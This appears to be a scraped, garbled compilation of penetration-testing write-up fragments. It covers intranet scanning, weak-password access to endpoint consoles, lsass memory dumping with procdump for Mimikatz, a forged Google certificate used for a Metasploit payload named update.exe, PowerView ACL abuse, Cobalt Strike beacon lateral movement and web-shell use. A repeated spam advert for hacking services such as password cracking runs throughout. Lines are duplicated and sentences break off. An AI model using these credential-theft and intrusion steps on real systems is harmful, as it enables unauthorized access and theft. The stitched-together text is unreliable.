So I added my IP address to the ACL rule set 2001. After adding the ACL rule, I could connect.
I tried using Plink to forward data from SSH into the intranet, but the security devices are different from Linux and cannot be proxied.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
I tried using Plink to forward data from SSH into the intranet, but the security devices are different from Linux and cannot be proxied.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Previously, internal network detection relied on timeout sockets, but this time, timeout sockets failed to find any assets, including some existing targets. F-NAScan was then used to scan and find many live hosts.
These hosts contained relatively few applications but many devices, and many had weak passwords, which I won't go into detail about here. I'll mainly focus on the discovery of centralized devices.
Two centralized devices were discovered on the internal network. One was a endpoint detection system from a certain vendor, as shown below: Common passwords were tried, but access was unsuccessful.
The second was an endpoint detection system from another vendor; a weak password allowed access to the backend.
These hosts contained relatively few applications but many devices, and many had weak passwords, which I won't go into detail about here. I'll mainly focus on the discovery of centralized devices.
Two centralized devices were discovered on the internal network. One was a endpoint detection system from a certain vendor, as shown below: Common passwords were tried, but access was unsuccessful.
The second was an endpoint detection system from another vendor; a weak password allowed access to the backend.
procdump.exe dumps the memory of the lsass.exe process, copies the resulting lsass.dmp file to the local machine, and then uses Mimikatz on the local machine to obtain the hash and plaintext. The lsass.exe process contains password information; Procdump is used to retrieve this information from lsass.exe. The command is:
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
procdump -accepteula -ma lsass.exe lsass.dmp.We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Place cer.cet in the HTTP server directory and start listening using Metasploit Framework (MSF). Then, execute the following command on the target machine to obtain the reverse session.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
The attacking machine uses OpenSSL to simulate Google's SSL certificate information, which can be modified. After generation, an encrypted file named www.google.com.pem will be generated. The private key and certificate can be viewed using the command
After creating the certificate, we can create an HTTP or HTTPS payload using MSF and provide a PEM format certificate for connection verification. This can be combined with other anti-virus evasion techniques. After generation, a malicious file named update.exe will be generated.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
cat www.google.com.pem.After creating the certificate, we can create an HTTP or HTTPS payload using MSF and provide a PEM format certificate for connection verification. This can be combined with other anti-virus evasion techniques. After generation, a malicious file named update.exe will be generated.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Delegation token: Used for interactive session login (e.g., direct login as a local user, remote desktop login). Impersonation token: Used for non-interactive login (using
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
net use to access shared folders).We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Use the PowerView tool to check the user's GenericAll permissions.
powershell -exec bypass
Import-Module .\PowerView.ps1
//Get the access control list (ACL) of AD objects for user man1, filtering to return items with "GenericAll" permissions
Get-ObjectAcl -SamAccountName man1 -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"} As you can see, the spotless user has GenericAll permissions on the delegate. Therefore, having obtained the spotless user's permissions, we can take over the delegate user's permissions.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
powershell -exec bypass
Import-Module .\PowerView.ps1
//Get the access control list (ACL) of AD objects for user man1, filtering to return items with "GenericAll" permissions
Get-ObjectAcl -SamAccountName man1 -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"} As you can see, the spotless user has GenericAll permissions on the delegate. Therefore, having obtained the spotless user's permissions, we can take over the delegate user's permissions.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Seeing IIS permissions, I tried to escalate them first, then requested system privileges to the client. Various privilege escalation methods were used, but all failed.
I tried uploading an EXE file, but the website blocked my test IP. Changing the IP and refreshing the folder showed the EXE was successfully uploaded, but the file was corrupted.
I discovered the server had Git installed. Testing
What? Wasn't it supposed to be a non-HTTP network? I checked
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
I tried uploading an EXE file, but the website blocked my test IP. Changing the IP and refreshing the folder showed the EXE was successfully uploaded, but the file was corrupted.
I discovered the server had Git installed. Testing
git clone https://github.com/xxx/ successfully downloaded the file C:\ProgramData\.What? Wasn't it supposed to be a non-HTTP network? I checked
netstat -ano...We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
First, version detection: The current version is 6.7.2. Although the scan detected vulnerability 21972, such machines often have a chance of having vulnerability CVE-2021-22005. The reason for trying 22005 is that the privileges obtained from 21972 are not root privileges, and privilege escalation will be required, which is very troublesome.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Use the same method to access host 141.
Use the trojan you just used to penetrate the domain controller, or generate a new trojan.
Upload it to host 143.
Copy beacon2.exe to host 141.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Use the trojan you just used to penetrate the domain controller, or generate a new trojan.
Upload it to host 143.
Copy beacon2.exe to host 141.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Generate a payload using CS.
Copy the generated txt file and execute it using the terminal of a web crawler like China Chopper or AntSword.
After a short while, you will see that it is online.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Copy the generated txt file and execute it using the terminal of a web crawler like China Chopper or AntSword.
After a short while, you will see that it is online.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Another common cause of false positives is user-defined sanitizers, such as those using regular expressions to validate or filter input. Let's take validation as an example, since it also requires additional consideration of control flow: To properly handle this example, you need to: (1) be able to analyze the impact of the regular expression /^[a-zA-Z0-9_]+$/ on different vulnerabilities; (2) consider the impact of preg_match($pattern, $username) within the if branch. This is called control flow sensitivity.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Here's our memory malware. If you directly use the memory malware, it will only display "you_are_successful!!!!!!!!!", but it won't execute any commands.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp